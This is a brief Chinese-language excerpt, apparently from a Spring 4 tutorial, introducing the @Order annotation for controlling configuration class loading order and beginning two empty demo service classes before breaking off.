    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他